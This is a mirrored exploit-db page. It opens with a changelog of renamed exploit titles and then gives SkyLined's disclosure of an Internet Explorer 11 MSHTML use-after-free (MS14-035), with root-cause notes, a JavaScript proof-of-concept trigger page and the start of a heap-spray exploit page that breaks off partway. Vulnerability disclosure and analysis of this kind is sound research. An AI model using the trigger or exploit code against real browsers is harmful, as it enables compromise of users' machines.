bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/platforms/windows/dos/40946.html
Offensive Security be57520c6f DB: 2016-12-21 
2 new exploits

FlashGet 1.9 - (FTP PWD Response) Remote Buffer Overflow (PoC)
FlashGet 1.9 - 'FTP PWD Response' Remote Buffer Overflow (PoC)

VMware Workstation - 'hcmon.sys 6.0.0.45731' Local Denial of Service
VMware Workstation 6.5.1 - 'hcmon.sys 6.0.0.45731' Local Denial of Service

Flashget 3.x - IEHelper Remote Exec (PoC)
FlashGet 3.x - IEHelper Remote Exec (PoC)

Rosoft media player 4.4.4 - Buffer Overflow (SEH) (PoC)
Rosoft Media Player 4.4.4 - Buffer Overflow (SEH) (PoC)
Google Android -  WifiNative::setHotlist Stack Overflow
Microsoft Internet Explorer 11 MSHTML - CSplice­Tree­Engine::Remove­Splice Use-After-Free (MS14-035)
FlashGet 1.9.0.1012 - (FTP PWD Response) SEH STACK Overflow
FlashGet 1.9.0.1012 - (FTP PWD Response) Buffer Overflow (SafeSEH)
FlashGet 1.9.0.1012 - 'FTP PWD Response' SEH STACK Overflow
FlashGet 1.9.0.1012 - 'FTP PWD Response' Buffer Overflow (SafeSEH)

freeFTPd - Remote Authentication Bypass
freeFTPd 1.2.6 - Remote Authentication Bypass

freeFTPd 1.0.10 - 'PASS' SEH Overflow (Metasploit)
freeFTPd 1.0.10 - 'PASS' SEH Buffer Overflow (Metasploit)

freeFTPd - 'PASS' Buffer Overflow (Metasploit)
freeFTPd 1.0.10 - 'PASS' Buffer Overflow (Metasploit)
AlberT-EasySite 1.0a5 - (PSA_PATH) Remote File Inclusion
iziContents RC6 - GLOBALS[] Remote Code Execution
AlberT-EasySite 1.0a5 - 'PSA_PATH' Parameter Remote File Inclusion
iziContents RC6 - Remote Code Execution

SunShop Shopping Cart 3.5 - 'abs_path' Remote File Inclusion
SunShop Shopping Cart 3.5 - 'abs_path' Parameter Remote File Inclusion

SunShop 4.0 RC 6 - 'Search' Blind SQL Injection
SunShop Shopping Cart 4.0 RC 6 - 'Search' Blind SQL Injection

izicontents rc6 - (Remote File Inclusion / Local File Inclusion) Multiple Vulnerabilities
iziContents rc6 - Remote File Inclusion / Local File Inclusion
gelato CMS 0.95 - (img) Remote File Disclosure
dotCMS 1.6 - 'id' Multiple Local File Inclusion
ZeeJobsite 2.0 - (adid) SQL Injection
gelato CMS 0.95 - 'img' Parameter Remote File Disclosure
dotCMS 1.6 - 'id' Parameter Local File Inclusion
Zeeways ZeeJobsite 2.0 - 'adid' Parameter SQL Injection

XNova 0.8 sp1 - (xnova_root_path) Remote File Inclusion
XNova 0.8 sp1 - 'xnova_root_path' Parameter Remote File Inclusion

PHPBasket - 'product.php pro_id' SQL Injection
PHPBasket - 'pro_id' Parameter SQL Injection
Ad Board - 'id' SQL Injection
SunShop 4.1.4 - 'id' SQL Injection
Banner Management Script - 'tr.php id' SQL Injection
Ad Board - 'id' Parameter SQL Injection
SunShop Shopping Cart 4.1.4 - 'id' Parameter SQL Injection
Banner Management Script - 'id' Parameter SQL Injection
phpBazar 2.0.2 - (adid) SQL Injection
webEdition CMS - (we_objectID) Blind SQL Injection
CustomCMS 4.0 - (CCMS) print.php SQL Injection
phpBazar 2.0.2 - 'adid' Parameter SQL Injection
webEdition CMS - 'we_objectID' Parameter Blind SQL Injection
CustomCMS 4.0 - 'print.php' SQL Injection

TinyCMS 1.1.2 - (templater.php) Local File Inclusion
TinyCMS 1.1.2 - 'templater.php' Local File Inclusion
onenews Beta 2 - (Cross-Site Scripting / HTML Injection / SQL Injection) Multiple Vulnerabilities
5 star review - (Cross-Site Scripting / SQL Injection) Multiple Vulnerabilities
onenews Beta 2 - Cross-Site Scripting / HTML Injection / SQL Injection
5 star review - Cross-Site Scripting / SQL Injection

Web Directory Script 2.0 - (name) SQL Injection
Web Directory Script 2.0 - 'name' Parameter SQL Injection

Crafty Syntax Live Help 2.14.6 - (department) SQL Injection
Crafty Syntax Live Help 2.14.6 - 'department' Parameter SQL Injection
k-rate - (SQL Injection / Cross-Site Scripting) Multiple Vulnerabilities
CMME 1.12 - (Local File Inclusion / Cross-Site Scripting / Cross-Site Request Forgery/Download Backup/Make Directory) Multiple Vulnerabilities
Thickbox Gallery 2.0 - (Admins.php) Admin Data Disclosure
k-rate - SQL Injection / Cross-Site Scripting
CMME 1.12 - Local File Inclusion / Cross-Site Scripting / Cross-Site Request Forgery/Download Backup/Make Directory
Thickbox Gallery 2.0 - 'Admins.php' Admin Data Disclosure

phpMyRealty 1.0.9 - Multiple SQL Injections
PHPMyRealty 1.0.9 - Multiple SQL Injections
brim 2.0.0 - (SQL Injection / Cross-Site Scripting) Multiple Vulnerabilities
Web Directory Script 1.5.3 - (site) SQL Injection
Words tag script 1.2 - (word) SQL Injection
Brim 2.0.0 - SQL Injection / Cross-Site Scripting
Web Directory Script 1.5.3 - 'site' Parameter SQL Injection
Words tag script 1.2 - 'word' Parameter SQL Injection

WeBid 0.5.4 - (item.php id) SQL Injection
WeBid 0.5.4 - 'item.php' SQL Injection

ZeeJobsite 2.0 - Arbitrary File Upload
Zeeways ZeeJobsite 2.0 - Arbitrary File Upload

BandSite CMS 1.1.4 - (members.php memid) SQL Injection
BandSite CMS 1.1.4 - 'members.php' SQL Injection

Thickbox Gallery 2 - 'index.php ln' Local File Inclusion
Thickbox Gallery 2 - 'index.php' Local File Inclusion

Joomla! Component 'com_wmtpic' 1.0 - SQL Injection
Joomla! Component com_wmtpic 1.0 - SQL Injection
Joomla! Component 'com_redshop' 1.0 - Local File Inclusion
Joomla! Component 'com_redtwitter' 1.0 - Local File Inclusion
Joomla! Component redSHOP 1.0 - Local File Inclusion
Joomla! Component redTWITTER 1.0 - Local File Inclusion
Joomla! Component 'com_svmap' 1.1.1 - Local File Inclusion
Joomla! Component 'com_shoutbox' - Local File Inclusion
Joomla! Component SVMap 1.1.1 - Local File Inclusion
Joomla! Component Shoutbox Pro - Local File Inclusion

Joomla! Component 'com_sebercart' 1.0.0.12 - Local File Inclusion
Joomla! Component Saber Cart 1.0.0.12 - Local File Inclusion

Joomla! Component 'com_xobbix' 1.0 - 'prodid' Parameter SQL Injection
Joomla! Component XOBBIX 1.0 - 'prodid' Parameter SQL Injection

Joomla! Component 'com_vjdeo' 1.0 - Local File Inclusion
Joomla! Component VJDEO 1.0 - Local File Inclusion

Joomla! Component 'com_realtyna' 1.0.15 - Local File Inclusion
Joomla! Component Realtyna Translator 1.0.15 - Local File Inclusion

Joomla! Component 'com_powermail' 1.5.3 - Local File Inclusion
Joomla! Component PowerMail Pro 1.5.3 - Local File Inclusion

Joomla! Component 'com_properties' - 'aid' Parameter SQL Injection
Joomla! Component Real Estate Property 3.1.22-03 - 'aid' Parameter SQL Injection

Joomla! Component 'com_tweetla' - Local File Inclusion
Joomla! Component TweetLA 1.0.1 - Local File Inclusion
Joomla! Component 'com_preventive' - Local File Inclusion
Joomla! Component 'com_rokmodule' - 'moduleid' Parameter Blind SQL Injection
Joomla! Component Preventive And Reservation 1.0.5 - Local File Inclusion
Joomla! Component RokModule 1.1 - 'moduleid' Parameter Blind SQL Injection

Joomla! Component 'com_travelbook' 1.0.1 - Local File Inclusion
Joomla! Component TRAVELbook 1.0.1 - Local File Inclusion

Joomla! Component 'com_webtv' - Local File Inclusion
Joomla! Component Web TV 1.0 - Local File Inclusion

Joomla! Component 'com_onlineexam' - Local File Inclusion
Joomla! Component Online Exam 1.5.0 - Local File Inclusion

Joomla! Component 'com_sweetykeeper' - Local File Inclusion
Joomla! Component Sweetykeeper 1.5 - Local File Inclusion

Joomla! Component 'com_sermonspeaker' - SQL Injection
Joomla! Component SermonSpeaker - SQL Injection

Joomla! Component 'com_QPersonel' - SQL Injection
Joomla! Component QPersonel 1.0.2 - SQL Injection

Joomla! Component 'com_photobattle' - Local File Inclusion
Joomla! Component Photo Battle 1.0.1 - Local File Inclusion
Joomla! Component 'com_zimbcomment' - Local File Inclusion
Joomla! Component 'com_zimbcore' - Local File Inclusion
Joomla! Component ZiMB Comment 0.8.1 - Local File Inclusion
Joomla! Component ZiMBCore 0.1 - Local File Inclusion
Joomla! Component 'com_wmi' - Local File Inclusion
Joomla! Component 'com_orgchart' - Local File Inclusion
Joomla! Component WMI 1.5.0 - Local File Inclusion
Joomla! Component OrgChart 1.0.0 - Local File Inclusion

Joomla! Component 'com_ultimateportfolio' - Local File Inclusion
Joomla! Component Ultimate Portfolio 1.0 - Local File Inclusion

Joomla! Component 'com_smartsite' - Local File Inclusion
Joomla! Component SmartSite 1.0.0 - Local File Inclusion

Joomla! Component 'com_simpledownload' 0.9.5 - Local File Inclusion
Joomla! Component simpledownload 0.9.5 - Local File Inclusion

Joomla! Component 'com_simpledownload' 0.9.5 - Local File Disclosure
Joomla! Component simpledownload 0.9.5 - Local File Disclosure

Wordpress Plugin TinyBrowser - Arbitrary File Upload
WordPress Plugin TinyBrowser - Arbitrary File Upload

Joomla! Component 'com_qpersonel' 1.0 - SQL Injection
Joomla! Component Q-Personel 1.0 - SQL Injection

Joomla! Component 'com_searchlog' - SQL Injection
Joomla! Component Search Log 3.1.0 - SQL Injection

Joomla! Component 'com_oziogallery' 2 - Multiple Vulnerabilities
Joomla! Component Ozio Gallery 2 - Multiple Vulnerabilities

Joomla! Component 'com_picasa2gallery' - Local File Inclusion
Joomla! Component Picasa2Gallery 1.2.8 - Local File Inclusion

Joomla! Component 'jeeventcalendar' - SQL Injection
Joomla! Component JE Ajax Event Calendar 1.0.5 - SQL Injection

Joomla! Component 'com_realtyna' - Local File Inclusion
Joomla! Component Realtyna Translator 1.0.15 - Local File Inclusion
Joomla! Component 'jesubmit' - SQL Injection
Joomla! Component 'com_sef' - Remote File Inclusion
Joomla! Component jesubmit 1.4 - SQL Injection
Joomla! Component com_sef - Remote File Inclusion

Joomla! Component 'jesectionfinder' - Local File Inclusion
Joomla! Component jesectionfinder - Local File Inclusion

Joomla! Component 'Joomanager' - SQL Injection
Joomla! Component Joomanager - SQL Injection

Joomla! Component 'com_socialads' - Persistent Cross-Site Scripting
Joomla! Component Techjoomla SocialAds - Persistent Cross-Site Scripting
Joomla! Component 'com_redshop' 1.0 - 'pid' Parameter SQL Injection
Joomla! Component 'com_quickfaq' - Blind SQL Injection
Joomla! Component redSHOP 1.0 - 'pid' Parameter SQL Injection
Joomla! Component QuickFAQ 1.0.3 - Blind SQL Injection

Joomla! Component 'com_redshop' 1.0.23.1 - Blind SQL Injection
Joomla! Component redSHOP 1.0.23.1 - Blind SQL Injection

Joomla! Component 'com_staticxt' - SQL Injection
Joomla! Component StaticXT - SQL Injection

Joomla! Component 'com_oziogallery' - SQL Injection
Joomla! Component Ozio Gallery - SQL Injection

Joomla! Component 'com_youtube' - SQL Injection
Joomla! Component YouTube 1.5 - SQL Injection

Joomla! Component 'com_ttvideo' 1.0 - SQL Injection
Joomla! Component TTVideo 1.0 - SQL Injection

Joomla! Component 'com_teams' - Multiple Blind SQL Injection
Joomla! Component Teams - Multiple Blind SQL Injection

Joomla! Component 'com_picsell' - Local File Disclosure
Joomla! Component PicSell 1.0 - Local File Disclosure

Joomla! Component 'com_restaurantguide' - Multiple Vulnerabilities
Joomla! Component Restaurant Guide 1.0.0 - Multiple Vulnerabilities

Joomla! Component 'com_timetrack' 1.2.4 - Multiple SQL Injection
Joomla! Component TimeTrack 1.2.4 - Multiple SQL Injection

Joomla! Component 'com_sponsorwall' - SQL Injection
Joomla! Component Sponsor Wall 1.1 - SQL Injection

Joomla! Component 'com_pro_desk' 1.5 - Local File Inclusion
Joomla! Component ProDesk 1.5 - Local File Inclusion

Joomla! Component 'mdigg' - SQL Injection
Joomla! Component mDigg 2.2.8 - SQL Injection

phpMyRealty 1.0.7 - SQL Injection
PHPMyRealty 1.0.7 - SQL Injection

Joomla! Component 'com_timereturns' 2.0 - SQL Injection
Joomla! Component Time Returns 2.0 - SQL Injection

Joomla! Component 'com_techfolio' 1.0 - SQL Injection
Joomla! Component Techfolio 1.0 - SQL Injection

Joomla! Component 'com_vikrealestate' 1.0 - Multiple Vulnerabilities
Joomla! Component Vik Real Estate 1.0 - Multiple Vulnerabilities

BRIM < 2.0.0 - SQL Injection
Brim < 2.0.0 - SQL Injection

Joomla! Component 'com_rokmodule' - 'module' Parameter Blind SQL Injection
Joomla! Component RokModule 1.1 - 'module' Parameter Blind SQL Injection

Wordpress Plugin White Label CMS 1.5 - Cross-Site Request Forgery / Persistent Cross-Site Scripting
WordPress Plugin White Label CMS 1.5 - Cross-Site Request Forgery / Persistent Cross-Site Scripting

webid 1.0.5 - Directory Traversal
weBid 1.0.5 - Directory Traversal

Wordpress Theme Clockstone (and other CMSMasters Themes) - Arbitrary File Upload
WordPress Theme Clockstone (and other CMSMasters Themes) - Arbitrary File Upload

Webid 1.0.6 - Multiple Vulnerabilities
WeBid 1.0.6 - Multiple Vulnerabilities
MyBulletinBoard RC4 - 'Username' Parameter SQL Injection
MyBulletinBoard RC4 - 'member.php' Multiple Parameter SQL Injection
MyBulletinBoard RC4 - 'polloptions' Parameter SQL Injection
MyBulletinBoard RC4 - 'action' Parameter SQL Injection
MyBulletinBoard (MyBB) RC4 - 'Username' Parameter SQL Injection
MyBulletinBoard (MyBB) RC4 - 'member.php' Multiple Parameter SQL Injection
MyBulletinBoard (MyBB) RC4 - 'polloptions' Parameter SQL Injection
MyBulletinBoard (MyBB) RC4 - 'action' Parameter SQL Injection

MyBulletinBoard 1.0 - Multiple SQL Injections
MyBulletinBoard (MyBB) 1.0 - Multiple SQL Injections

MyBulletinBoard 1.0 - 'RateThread.php' SQL Injection
MyBulletinBoard (MyBB) 1.0 - 'RateThread.php' SQL Injection

MyBulletinBoard 1.0 - 'usercp.php' SQL Injection
MyBulletinBoard (MyBB) 1.0 - 'usercp.php' SQL Injection

Joomla! Component 'com_redshop' 1.2 - SQL Injection
Joomla! Component redSHOP 1.2 - SQL Injection

MyBulletinBoard 1.0.x/1.1.x - 'usercp.php' SQL Injection
MyBulletinBoard (MyBB) 1.0.x/1.1.x - 'usercp.php' SQL Injection

MyBulletinBoard 1.x - 'usercp.php' Directory Traversal
MyBulletinBoard (MyBB) 1.x - 'usercp.php' Directory Traversal
Grayscale BandSite CMS 1.1 - help_news.php the_band Parameter Cross-Site Scripting
Grayscale BandSite CMS 1.1 - help_merch.php the_band Parameter Cross-Site Scripting
Grayscale BandSite CMS 1.1 - help_mp3.php max_file_size_purdy Parameter Cross-Site Scripting
Grayscale BandSite CMS 1.1 - sendemail.php message_text Parameter Cross-Site Scripting
Grayscale BandSite CMS 1.1 - header.php the_band Parameter Cross-Site Scripting
Grayscale BandSite CMS 1.1 - login_header.php the_band Parameter Cross-Site Scripting
Grayscale BandSite CMS 1.1 - bio_content.php the_band Parameter Cross-Site Scripting
Grayscale BandSite CMS 1.1 - gbook_content.php the_band Parameter Cross-Site Scripting
Grayscale BandSite CMS 1.1 - interview_content.php the_band Parameter Cross-Site Scripting
Grayscale BandSite CMS 1.1 - links_content.php the_band Parameter Cross-Site Scripting
Grayscale BandSite CMS 1.1 - lyrics_content.php the_band Parameter Cross-Site Scripting
Grayscale BandSite CMS 1.1 - member_content.php the_band Parameter Cross-Site Scripting
Grayscale BandSite CMS 1.1 - merch_content.php the_band Parameter Cross-Site Scripting
Grayscale BandSite CMS 1.1 - mp3_content.php the_band Parameter Cross-Site Scripting
Grayscale BandSite CMS 1.1 - news_content.php the_band Parameter Cross-Site Scripting
Grayscale BandSite CMS 1.1 - pastshows_content.php the_band Parameter Cross-Site Scripting
Grayscale BandSite CMS 1.1 - photo_content.php the_band Parameter Cross-Site Scripting
Grayscale BandSite CMS 1.1 - releases_content.php the_band Parameter Cross-Site Scripting
Grayscale BandSite CMS 1.1 - reviews_content.php the_band Parameter Cross-Site Scripting
Grayscale BandSite CMS 1.1 - shows_content.php the_band Parameter Cross-Site Scripting
Grayscale BandSite CMS 1.1 - signgbook_content.php the_band Parameter Cross-Site Scripting
Grayscale BandSite CMS 1.1 - footer.php this_year Parameter Cross-Site Scripting
BandSite CMS 1.1 - 'help_news.php' Cross-Site Scripting
BandSite CMS 1.1 - 'help_merch.php' Cross-Site Scripting
BandSite CMS 1.1 - 'help_mp3.php' Cross-Site Scripting
BandSite CMS 1.1 - 'sendemail.php' Cross-Site Scripting
BandSite CMS 1.1 - 'header.php' Cross-Site Scripting
BandSite CMS 1.1 - 'login_header.php' Cross-Site Scripting
BandSite CMS 1.1 - 'bio_content.php' Cross-Site Scripting
BandSite CMS 1.1 - 'gbook_content.php' Cross-Site Scripting
BandSite CMS 1.1 - 'interview_content.php' Cross-Site Scripting
BandSite CMS 1.1 - 'links_content.php' Cross-Site Scripting
BandSite CMS 1.1 - 'lyrics_content.php' Cross-Site Scripting
BandSite CMS 1.1 - 'member_content.php' Cross-Site Scripting
BandSite CMS 1.1 - 'merch_content.php' Cross-Site Scripting
BandSite CMS 1.1 - 'mp3_content.php' Cross-Site Scripting
BandSite CMS 1.1 - 'news_content.php' Cross-Site Scripting
BandSite CMS 1.1 - 'pastshows_content.php' Cross-Site Scripting
BandSite CMS 1.1 - 'photo_content.php' Cross-Site Scripting
BandSite CMS 1.1 - 'releases_content.php' Cross-Site Scripting
BandSite CMS 1.1 - 'reviews_content.php' Cross-Site Scripting
BandSite CMS 1.1 - 'shows_content.php' Cross-Site Scripting
BandSite CMS 1.1 - 'signgbook_content.php' Cross-Site Scripting
BandSite CMS 1.1 - 'footer.php' Cross-Site Scripting

Wordpress Plugin Quick Paypal Payments 3.0 - Presistant Cross-Site Scripting
WordPress Plugin Quick Paypal Payments 3.0 - Presistant Cross-Site Scripting

Active PHP BookMarks 1.1.2 - APB_SETTINGS['apb_path' ] Multiple Remote File Inclusion
Active PHP BookMarks 1.1.2 - Multiple Remote File Inclusion

Wordpress Theme Redoable 1.2 - header.php s Parameter Cross-Site Scripting
WordPress Theme Redoable 1.2 - header.php s Parameter Cross-Site Scripting

TurnkeyWebTools Sunshop 3.5/4.0 - Multiple Remote File Inclusion
SunShop Shopping Cart 3.5/4.0 - Multiple Remote File Inclusion

Active PHP BookMarks 1.0 - APB.php Remote File Inclusion
Active PHP BookMarks 1.0 - 'APB.php' Remote File Inclusion
TurnkeyWebTools SunShop Shopping Cart 4.0 - 'index.php' Multiple Parameter SQL Injection
TurnkeyWebTools SunShop Shopping Cart 4.0 - 'index.php' l Parameter Cross-Site Scripting
SunShop Shopping Cart 4.0 - 'index.php' Multiple Parameter SQL Injection
SunShop Shopping Cart 4.0 - 'index.php' l Parameter Cross-Site Scripting

Wordpress Plugin Google FeedBurner FeedSmith 2.2 - Cross-Site Request Forgery
WordPress Plugin Google FeedBurner FeedSmith 2.2 - Cross-Site Request Forgery

DMCMS 0.7 - 'index.php' SQL Injection
deeemm CMS (dmcms) 0.7 - 'index.php' SQL Injection
EasySite 2.0 - browser.php EASYSITE_BASE Parameter Remote File Inclusion
EasySite 2.0 - image_editor.php EASYSITE_BASE Parameter Remote File Inclusion
EasySite 2.0 - skin_chooser.php EASYSITE_BASE Parameter Remote File Inclusion
EasySite 2.0 - 'browser.php' Remote File Inclusion
EasySite 2.0 - 'image_editor.php' Remote File Inclusion
EasySite 2.0 - 'skin_chooser.php' Remote File Inclusion

MatterDaddy Market 1.1 - 'admin/login.php' Cross-Site Scripting
MatterDaddy Market 1.1 - 'login.php' Cross-Site Scripting

Wordpress Plugin TYPO3 - 't3m_cumulus_tagcloud' Extension 1.0 - HTML Injection / Cross-Site Scripting
WordPress Plugin TYPO3 - 't3m_cumulus_tagcloud' Extension 1.0 - HTML Injection / Cross-Site Scripting
Joomla! Component 'com_perchaimageattach' 1.1 - 'Controller' Parameter Traversal Arbitrary File Access
Joomla! Component 'com_perchafieldsattach' 1.0 - 'index.php' Controller Parameter Traversal Arbitrary File Access
Joomla! Component 'com_perchadownloadsattach' 1.1 - 'Controller' Parameter Traversal Arbitrary File Access
Joomla! Component 'com_perchagallery' 1.6 Beta - 'Controller' Parameter Traversal Arbitrary File Access
Joomla! Component Percha Image Attach 1.1 - 'Controller' Parameter Traversal Arbitrary File Access
Joomla! Component Percha Fields Attach 1.0 - 'Controller' Parameter Traversal Arbitrary File Access
Joomla! Component Percha Downloads Attach 1.1 - 'Controller' Parameter Traversal Arbitrary File Access
Joomla! Component Percha Gallery 1.6 Beta - 'Controller' Parameter Traversal Arbitrary File Access

Joomla! Component 'com_perchacategoriestree' 0.6 - 'Controller' Parameter Arbitrary File Access
Joomla! Component Percha Multicategory Article 0.6 - 'Controller' Parameter Arbitrary File Access

Joomla! Component 'com_youtubegallery' - SQL Injection
Joomla! Component Youtube Gallery 4.1.7 - SQL Injection

Wordpress Plugin Firestats 1.6.5 - Multiple Cross-Site Scripting Vulnerabilities
WordPress Plugin Firestats 1.6.5 - Multiple Cross-Site Scripting Vulnerabilities

Joomla! Component 'FreiChat' 1.0/2.x - Unspecified HTML Injection
Joomla! Component FreiChat 1.0/2.x - Unspecified HTML Injection

Wordpress Plugin WooCommerce Store Exporter 1.7.5 - Multiple Cross-Site Scripting Vulnerabilities
WordPress Plugin WooCommerce Store Exporter 1.7.5 - Multiple Cross-Site Scripting Vulnerabilities

Joomla! Component 'com_weblinks' - 'Itemid' Parameter SQL Injection
Joomla! Component Weblinks - 'Itemid' Parameter SQL Injection

Wordpress Plugin Creative Contact Form 0.9.7 - Arbitrary File Upload
WordPress Plugin Creative Contact Form 0.9.7 - Arbitrary File Upload

Wordpress Plugin Powerhouse Museum Collection Image Grid 0.9.1.1 - 'tbpv_username' Parameter Cross-Site Scripting
WordPress Plugin Powerhouse Museum Collection Image Grid 0.9.1.1 - 'tbpv_username' Parameter Cross-Site Scripting

Wordpress Plugin Paid Memberships Pro 1.7.14.2 - Directory Traversal
WordPress Plugin Paid Memberships Pro 1.7.14.2 - Directory Traversal

Wordpress Plugin DukaPress 2.5.2 - Directory Traversal
WordPress Plugin DukaPress 2.5.2 - Directory Traversal

Wordpress Plugin Google Document Embedder 2.5.16 - mysql_real_escpae_string Bypass SQL Injection
WordPress Plugin Google Document Embedder 2.5.16 - mysql_real_escpae_string Bypass SQL Injection

Wordpress Plugin WonderPlugin Audio Player 2.0 - Blind SQL Injection / Cross-Site Scripting
WordPress Plugin WonderPlugin Audio Player 2.0 - Blind SQL Injection / Cross-Site Scripting

Wordpress Plugin Duplicator 0.5.8 - Privilege Escalation
WordPress Plugin Duplicator 0.5.8 - Privilege Escalation

Wordpress Plugin Single Personal Message 1.0.3 - SQL Injection
WordPress Plugin Single Personal Message 1.0.3 - SQL Injection

Joomla! Component 'com_sanpham' - Multiple SQL Injections
Joomla! Component Vik Real Estate 1.0 - Multiple SQL Injections

Wordpress Plugin VideoWhisper Video Conference Integration 4.91.8 - Arbitrary File Upload
WordPress Plugin VideoWhisper Video Conference Integration 4.91.8 - Arbitrary File Upload

Joomla! Component 'mod_currencyconverter' - 'from' Parameter Cross-Site Scripting
Joomla! Component Currency Converter 1.0.0 - 'from' Parameter Cross-Site Scripting

Wordpress Plugin Shareaholic 7.6.0.3 - Cross-Site Scripting
WordPress Plugin Shareaholic 7.6.0.3 - Cross-Site Scripting

Wordpress Plugin Paypal Currency Converter Basic For WooCommerce - File Read
WordPress Plugin Paypal Currency Converter Basic For WooCommerce - File Read

Joomla! Component 'mod_ccnewsletter' 1.0.7 - 'id' Parameter SQL Injection
Joomla! Component CCNewsLetter 1.0.7 - 'id' Parameter SQL Injection

Wordpress Plugin Simple Photo Gallery 1.7.8 - Blind SQL Injection
WordPress Plugin Simple Photo Gallery 1.7.8 - Blind SQL Injection

Wordpress Plugin PDF & Print Button Joliprint 1.3.0 - Multiple Cross-Site Scripting Vulnerabilities
WordPress Plugin PDF & Print Button Joliprint 1.3.0 - Multiple Cross-Site Scripting Vulnerabilities
Wordpress Plugin 2 Click Social Media Buttons 0.32.2 - Multiple Cross-Site Scripting Vulnerabilities
Wordpress Plugin iFrame Admin Pages 0.1 - 'main_page.php' Cross-Site Scripting
WordPress Plugin 2 Click Social Media Buttons 0.32.2 - Multiple Cross-Site Scripting Vulnerabilities
WordPress Plugin iFrame Admin Pages 0.1 - 'main_page.php' Cross-Site Scripting
Wordpress Plugin Media Library Categories - Multiple Cross-Site Scripting Vulnerabilities
Wordpress Plugin LeagueManager 3.7 - Multiple Cross-Site Scripting Vulnerabilities
WordPress Plugin Media Library Categories - Multiple Cross-Site Scripting Vulnerabilities
WordPress Plugin LeagueManager 3.7 - Multiple Cross-Site Scripting Vulnerabilities
Wordpress Plugin GD Star Rating 1.9.16 - 'tpl_section' Parameter Cross-Site Scripting
Wordpress Plugin ]Mingle Forum 1.0.33 - 'admin.php' Multiple Cross-Site Scripting Vulnerabilities
WordPress Plugin GD Star Rating 1.9.16 - 'tpl_section' Parameter Cross-Site Scripting
WordPress Plugin ]Mingle Forum 1.0.33 - 'admin.php' Multiple Cross-Site Scripting Vulnerabilities

Wordpress Plugin Share and Follow 1.80.3 - 'admin.php' Cross-Site Scripting
WordPress Plugin Share and Follow 1.80.3 - 'admin.php' Cross-Site Scripting

Wordpress Plugin EZ SQL Reports < 4.11.37 - Multiple Vulnerabilities
WordPress Plugin EZ SQL Reports < 4.11.37 - Multiple Vulnerabilities
Joomla! Component 'com_rpl' 8.9.2 - Multiple SQL Injections
Joomla! Component 'com_rpl' 8.9.2 - Persistent Cross-Site Scripting / Cross-Site Request Forgery
Joomla! Component Realtyna RPL 8.9.2 - Multiple SQL Injections
Joomla! Component Realtyna RPL 8.9.2 - Persistent Cross-Site Scripting / Cross-Site Request Forgery

Wordpress Plugin Xorbin Analog Flash Clock - 'widgetUrl' Parameter Cross-Site Scripting
WordPress Plugin Xorbin Analog Flash Clock - 'widgetUrl' Parameter Cross-Site Scripting

Wordpress Plugin miniBB - SQL Injection / Multiple Cross-Site Scripting Vulnerabilities
WordPress Plugin miniBB - SQL Injection / Multiple Cross-Site Scripting Vulnerabilities

Joomla! Component 'com_sexypolling' - 'answer_id' Parameter SQL Injection
Joomla! Component Sexy polling 1.0.8 - 'answer_id' Parameter SQL Injection

Joomla! Component 'com_novasfh' - 'upload.php' Arbitrary File Upload
Joomla! Component Projoom NovaSFH 3.0.2 - 'upload.php' Arbitrary File Upload

Wordpress Plugin Simple Ads Manager 2.9.4.116 - SQL Injection
WordPress Plugin Simple Ads Manager 2.9.4.116 - SQL Injection

Wordpress Plugin Acunetix WP Security Plugin 3.0.3 - Cross-Site Scripting
WordPress Plugin Acunetix WP Security Plugin 3.0.3 - Cross-Site Scripting

Wordpress Plugin Job Script by Scubez - Remote Code Execution
WordPress Plugin Job Script by Scubez - Remote Code Execution

Wordpress Plugin Premium SEO Pack 1.9.1.3 - wp_options Overwrite
WordPress Plugin Premium SEO Pack 1.9.1.3 - wp_options Overwrite
Wordpress Plugin Answer My Question 1.3 - SQL Injection
Wordpress Plugin Sirv 1.3.1 - SQL Injection
Wordpress Plugin BBS e-Franchise 1.1.1 - SQL Injection
Wordpress Plugin Product Catalog 8 1.2.0 - SQL Injection
WordPress Plugin Answer My Question 1.3 - SQL Injection
WordPress Plugin Sirv 1.3.1 - SQL Injection
WordPress Plugin BBS e-Franchise 1.1.1 - SQL Injection
WordPress Plugin Product Catalog 8 1.2.0 - SQL Injection

Wordpress Plugin Olimometer 2.56 - SQL Injection
WordPress Plugin Olimometer 2.56 - SQL Injection

Wordpress Plugin WP Vault 0.8.6.6 - Local File Inclusion
WordPress Plugin WP Vault 0.8.6.6 - Local File Inclusion
Wordpress Plugin WP Support Plus Responsive Ticket System 7.1.3 - SQL Injection
Wordpress Plugin WP Private Messages 1.0.1 - SQL Injection
WordPress Plugin WP Support Plus Responsive Ticket System 7.1.3 - SQL Injection
WordPress Plugin WP Private Messages 1.0.1 - SQL Injection
2016-12-21 05:01:18 +00:00

188 lines
No EOL
8.3 KiB
HTML
Executable file
Raw Blame History

This file contains invisible Unicode characters

This file contains invisible Unicode characters that are indistinguishable to humans but may be processed differently by a computer. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

<!--
Source: http://blog.skylined.nl/20161220001.html
Synopsis
A specially crafted web-page can trigger a use-after-free vulnerability in Microsoft Internet Explorer 11. There is sufficient time between the free and reuse for an attacker to control the contents of the freed memory and exploit the vulnerability.
Known affected software, attack vectors and potential mitigations
Microsoft Internet Explorer 11
An attacker would need to get a target user to open a specially crafted web-page. Disabling Java­Script should prevent an attacker from triggering the vulnerable code path.
Details
This was one of the first bugs where I attempted to do a proper analysis, and I got some feedback from ZDI that explained what I got right and what I got wrong. Basically, on x86, a 0x28 byte memory block is allocated in MSHTML!CMarkup::Do­Embed­Pointers and when you execute document.exec­Command("Delete"). This memory can be freed when you execute document.open() in a DOMNode­Removed event handler. After that, you can use Javascript to reallocate the memory before it is reused.
Repro.html:
<!doctype html>
<html>
<head>
<meta http-equiv="X-UA-Compatible" content="IE=11">
<script type="text/javascript">
document.add­Event­Listener("DOMNode­Removed", function () {
document.open(); // free
// attempt to modify freed memory here
// because it will be reused after this function returns.
}, true);
window.onload = function () {
document.design­Mode="on";
document.exec­Command("Select­All");
document.exec­Command("Delete"); // allocate
};
</script>
</head>
<body>
</body>
</html>
Exploit
After getting the feedback from ZDI that helped me understand the root cause, I attempted to write an exploit that the issue could be controlled and may be exploitable. I did not keep track of whether my attempts where successful, so the below code may not actually function. However, it should give you an idea on how one might go about writing an exploit for this vulnerability.
Sploit.html:
-->
<!doctype html>
<html>
<head>
<meta http-equiv="X-UA-Compatible" content="IE=11">
<script src="c­LFHSpray.js"></script>
<script src="c­Block­Spray.js"></script>
<script>
var aau­Copies­And­Sizes = [
[0x08, 0x80],
